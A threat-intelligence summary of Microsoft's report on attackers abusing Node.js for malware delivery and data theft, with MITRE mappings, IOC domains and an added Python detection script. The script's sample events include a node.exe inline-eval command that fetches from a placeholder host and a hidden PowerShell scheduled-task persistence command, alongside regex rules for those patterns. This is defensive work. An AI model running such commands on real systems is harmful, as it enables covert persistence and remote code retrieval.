Threat actors misuse Node.js to deliver malware and other malicious payloads

Microsoft Defender Experts have reported malicious campaigns that use Node.js to deliver malware and facilitate information theft. The trend marks a shift in threat actor tradecraft toward blending malicious code with legitimate, widely trusted runtimes, and indicates the growing use of Node.js in cyber threats. Affected: cybersecurity, software development

Key points:

  • Microsoft Defender Experts have observed Node.js being used for malware delivery and data exfiltration since October 2024.
  • The adoption of Node.js by threat actors reflects an evolution in malicious tactics beyond traditional scripting languages.
  • Malvertising campaigns lure victims to download malware disguised as legitimate cryptocurrency trading software.
  • The attacks use a malicious DLL to persist in the target environment and gather system information.
  • Defense evasion tactics include creating scheduled tasks that launch PowerShell in ways designed to evade security detections.
  • Data collected from victims includes system and BIOS information, which is then sent to command-and-control servers.
  • Inline JavaScript execution has also been observed, where the malicious script is passed to the Node.js binary on the command line and runs in memory without ever being saved to a file.
  • Recommended mitigations include user education, monitoring Node.js executions, and enforcing PowerShell logging.
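As an added example (not code from Microsoft's report or from this page), the following Python script applies the detection ideas above, monitoring Node.js executions and PowerShell scheduled-task creation, to a handful of constructed process-creation events. The record field names (parent, image, cmdline), the file paths and the sample command lines are assumptions for illustration, not observed indicators.

```python
"""Hunt process-creation telemetry for Node.js and PowerShell abuse patterns.

Added example, not code from Microsoft's report. The events below are
constructed; the field layout (parent, image, cmdline) is an assumption
about how an EDR or Sysmon process-creation export looks.
"""
import re
from typing import Dict, List

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # benign: developer runs a project server from the standard install path
    {"id": "1", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": r'"C:\Program Files\nodejs\node.exe" server.js'},
    # suspicious: node.exe dropped in a user-writable path, spawned by
    # PowerShell, evaluating an inline script passed with -e (never on disk)
    {"id": "2", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\victim\AppData\Local\Temp\node.exe",
     "cmdline": r'node.exe -e "const h=require(\"https\");h.get(\"https://example.invalid/x\",r=>r.pipe(process.stdout))"'},
    # suspicious: PowerShell registers a scheduled task while hiding its window
    {"id": "3", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -NoProfile -Command "schtasks /create /sc minute /mo 5 /tn Updater /tr \"node.exe C:\Users\victim\AppData\Roaming\app.js\""'},
    # benign: an admin lists tasks from an interactive console
    {"id": "4", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -Command "Get-ScheduledTask | Where State -eq Ready"'},
]

# node -e / --eval / -p / --print all execute code supplied on the command line.
INLINE_JS_FLAG = re.compile(r"(?:^|\s)(?:-e|--eval|-p|--print)(?:\s|=|$)")
# Directories an unprivileged user can write to; a legitimate Node.js install lives elsewhere.
USER_WRITABLE = re.compile(r"\\(?:AppData|Temp|Downloads|Public|ProgramData)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.IGNORECASE)
# PowerShell switches commonly combined to avoid a visible window, profile scripts or policy.
PS_STEALTH = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass|enc(?:odedcommand)?)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the list of rule names an event triggers (empty if benign)."""
    findings: List[str] = []
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    if image == "node.exe":
        if INLINE_JS_FLAG.search(cmd):
            findings.append("node_inline_eval")
        if USER_WRITABLE.search(event["image"]):
            findings.append("node_from_user_writable_path")
        if parent in SCRIPT_HOSTS:
            findings.append("node_spawned_by_script_host")
    if image in ("powershell.exe", "pwsh.exe") and TASK_CREATE.search(cmd):
        if PS_STEALTH.search(cmd):
            findings.append("powershell_stealth_task_create")
        else:
            findings.append("powershell_task_create")
    return findings


def hunt(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id -> triggered rules for every event that fired at least one rule."""
    hits: Dict[str, List[str]] = {}
    for event in events:
        findings = evaluate(event)
        if findings:
            hits[event["id"]] = findings
    return hits


if __name__ == "__main__":
    for event_id, rules in hunt(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Running the script flags events 2 and 3 and leaves the two benign ones alone. The node rules are deliberately layered: an inline `-e` script alone is common in build tooling, but combined with a binary in a user-writable directory and a scripting parent it is a strong signal, which is the point of correlating several weak indicators rather than alerting on any one of them.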

MITRE Techniques:

  • T1189 – Drive-by Compromise: Malware is downloaded from malicious websites, such as fake cryptocurrency trading websites.
  • T1053.005 – Scheduled Task/Job: Scheduled Task: Establishes persistence by creating scheduled tasks (the registry modifications the summary also mentions map to T1547.001, not to this technique).
  • T1564.001 – Hide Artifacts: Hidden Files and Directories: Evades security controls by hiding files.
  • T1027 – Obfuscated Files or Information: Uses obfuscation to hide malicious actions.
  • T1082 – System Information Discovery: Gathers detailed system information, including hardware and software data.
  • T1003 – OS Credential Dumping: Extracts system credentials; the browser data theft also noted here maps more precisely to T1555.003 (Credentials from Web Browsers).
  • T1005 – Data from Local System: Captures system details, installed software, and network information.
  • T1071.001 – Application Layer Protocol: Web Protocols: Uses web-based protocols for data exfiltration.
  • T1041 – Exfiltration Over C2 Channel: Sends collected data to remote servers through HTTP POST.

Indicators of Compromise:

  • [Domain] sublime-forecasts-pale-scored.trycloudflare.com
  • [Domain] washing-cartridges-watts-flags.trycloudflare.com
  • [Domain] investigators-boxing-trademark-threatened.trycloudflare.com
  • [Domain] fotos-phillips-princess-baker.trycloudflare.com
  • [Domain] casting-advisors-older-invitations.trycloudflare.com


Full Story: https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/